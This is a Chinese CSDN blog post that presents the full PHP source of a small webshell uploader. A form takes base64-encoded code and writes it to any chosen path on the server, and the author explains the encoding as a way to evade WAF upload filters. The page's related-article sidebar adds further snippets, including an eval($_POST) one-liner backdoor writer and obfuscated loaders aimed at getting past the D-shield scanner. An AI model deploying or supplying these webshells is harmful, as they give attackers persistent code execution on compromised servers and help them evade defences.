PHP小马

最新推荐文章于 2022-02-16 15:33:58 发布
最新推荐文章于 2022-02-16 15:33:58 发布
阅读量1.9k 收藏 2
点赞数
分类专栏: 编程 web hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eT48_sec/article/details/42400843
版权

http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。


看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。

<?php
error_reporting(E_ERROR);
header('Content-Type:text/html; charset=utf-8');
$path=getcwd();
$perms=substr(sprintf('%o',fileperms($path)),-4);
echo 'Power By eT48<br />';
echo '本程序路径: '.__FILE__.'<br />';
echo '当前目录权限: '.$perms;
print<<<END
	<form method='post'>
		<textarea name='code' rows='15' lows='40'></textarea><br />
     	保存路径:<input type='text' name='uppath' /><br />
		<input type='submit' name='submit' value='上传' />
		   
        <input type='reset' name='reset' value='重置' />
    </form>
END;

if(strlen($_POST['code'])>0){
	$code=base64_decode($_POST['code']);
	$uppath=empty($_POST['uppath'])?$path.'/shell.php':trim($_POST['uppath']);
	$handle=fopen($uppath,'w') or die('创建文件失败');
	fwrite($handle,$code) or die('写入文件失败');
	fclose($handle);
	echo '文件上传成功';
}
else
	echo '请将数据经base64编码后在上传';
?>

为什么将代码经过base64编码再上传呢,因为有遇到过waf拦截上传的文件的情况。


eT48_Sec
关注
专栏目录
[php]写入类小马
qq_37301470的博客
11-18 277
<?php header("Content-type:text/html;charset=utf-8"); $get=$_GET['pwd']; $pass=md5(md5(123)); if(!empty($get)){ if(md5(md5($get))==$pass){ echo "login"."<br>"; echo '<form method="post">'; echo "服务器类型:".$_SERVER['SERVER_SOFT
php超小免杀大马_超小PHP小马小结(方便查找后门的朋友)免杀
weixin_39579483的博客
12-30 867
作者: spider我也来个超小PHP小马复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
分享PHP小马一枚,完美绕过安全狗检测。
weixin_30565327的博客
01-23 351
没做免杀之前,被狗咬死: 直接上代码: $p=realpath(dirname(__FILE__)."/../").$_POST["a"];$t=$_POST["b"];$tt="";for ($i=0;$i@fwrite(fopen($p,"w"),$tt);echo "success!";?> 代码分析: $p=realpath(dirname(__FILE...
PHP小马免杀
weixin_34072159的博客
11-12 774
PHP小马免杀 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; c...
PHP小马,大马实现分析编写
热门推荐
Love&Share
03-15 1万+
PHP工具开发 PHP小马 简单隐藏 登陆密码 实现写入文件 <?php $pass = '14e1b600b1fd579f47433b88e8d85291'; #123456 $get = $_GET['pass']; if (!empty($get)) { if (md5(md5($get))) { if (!empty($_POST)) { $path=$_POST['filepath']; $content=$_P
PHP小马免杀的浅谈[过最新D盾]1
08-03
PHP小马通常是指一种恶意代码,允许攻击者远程控制被入侵的服务器,执行任意PHP命令。文章中提到了两种绕过D盾检测的方法。 **方法一:使用写文件函数** 首先,作者提到了使用`file_put_contents`函数来创建一个新...
超小PHP小马小结(方便查找后门的朋友)
12-19
作者: spider 我也来个超小PHP小马 复制代码 代码如下: <?php header(“content-Type: text/html; charset=gb2312”); if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); ?&...
PHP小马总结
weixin_45486362的博客
06-25 421
利用文件上传漏洞,往目标网站中上传一句话木马,只要攻击者满足三个条件,就能实现成功入侵。 (1)木马上传成功,未被杀; (2)知道木马的路径在哪; (3)上传的木马能正常运行。 我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。 所以看到的经典一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数
PHP小马免杀的浅谈[过最新D盾]
shadowwolf’s blog
07-25 831
PHP小马免杀的浅谈[过最新D盾] 绕过主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行方法1:File_put_content方法2 使用fwrite 绕过 主要思路:使用写文件的函数写出另一个php文件然后include/require 回来执行 方法1:File_put_content D盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴: <?php /* T00ls.net shadowwolf 2021-7-25 */ ( ~urldec
php小马怎么打开,PHP小马
weixin_34405261的博客
03-09 254
http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。error_reporting(E_ERROR);header('Content-Type:text/html; charset=utf-8');$path=getcwd();$perms=substr(sprint...
未加密PHP小马源代码
01-10
未加密的PHP网马源代码,供代码研究。 部分代码: $v) $_POST[$k] = stripslashes($v); ?>
PHP过D盾免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
一款过d盾PHP小马
shadowwolf’s blog
12-14 361
<?php $_='%99%88%8D%96%8B%9A'; $pass='a'; $rand_=rand(); $a=$_POST[$pass]; $file=md5('shadowwolf'); $shell='<?php '.$a.' ?>'; $myfile = fopen($file, "w"); (~urldecode($_))($myfile, $shell); include $file; 可以自己测测看啊
php小马怎么打开,php小马是什么
weixin_33687939的博客
03-09 935
php小马是什么?php小马也就是一句话木马,就是指只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。我们如何发送命令,发送的命令如何执行?我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE...
php webshell探索-常见小马
qq_44370676的博客
12-11 4968
webshell一.何为webshell二.常见小马探索1.直接型2.通过反射类调用3.通过排序函数调用4.通过类的混淆1.类的魔术方法2.类的自定义方法3.通过反射获取类的注释5.通过函数的混淆6.普通的混淆7.其他的隐藏方式1.ob_start2.register_shutdown_function3.回调函数4.数组5.反引号 一.何为webshell 黑客通过一定途径将webshell上传至服务器具有执行权限(必须要有执行权限才可以,没有执行权限是没有用的)的WEB目录下。远程访问webshell实
PHP木马
qq_41272376的博客
02-16 4852
PHP木马 一句话木马 可以在目标服务器上执行PHP代码,并和客户端(如菜刀,Cknife、冰蝎、蚁剑)进行交互的webshell,俗称小马。 多功能木马 根据PHP语法,编写较多代码,并在服务器上执行,完成所有功能的Webshell,俗称大马 逻辑木马 利用系统逻辑漏洞(如php uaf漏洞),绕过访问控制或执行特殊功能的WebShell PHP 可执行系统命令的函数 system string system ( string $command [, int &$return_var ] );
php小马怎么打开,超小PHP小马小结(方便查找后门的朋友)
weixin_34917128的博客
03-09 306
作者: spider我也来个超小PHP小马复制代码代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file'...
同目录下生成一个php小马
weixin_30325793的博客
04-30 206
<?fputs(fopen("mm.php","w"),"<?eval(\$_POST[888888]);?>")?> 保存为php文件上传。这段代码的意思是在当前目录下生成一个名为mm.php的文件 [原创]特殊的php上传漏洞再到获取linux root最后栽下rootkit 文章作者:sunwear信息来源:邪恶八进制信息安全团队(www.eviloctal...
php文件上传 小马,php文件上传函数
weixin_30682043的博客
03-10 857
php文件上传函数/**+++++++++++++++++++++=+++++上传图片++++++++++++++++++++++++++++++++++++++++——————————————————————————————————————————————————————————————————————————————————**/function upload_image($key,$dir)...
PHP小马免杀技巧:绕过D盾解析
"PHP小马免杀的浅谈[过最新D盾]1" 本文主要讨论的是如何在PHP环境中创建和执行免杀(即避免安全检测工具检测)的小马(恶意代码),特别是针对最新版本的D盾防御系统。作者分享了两种主要的绕过策略。 策略一:...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值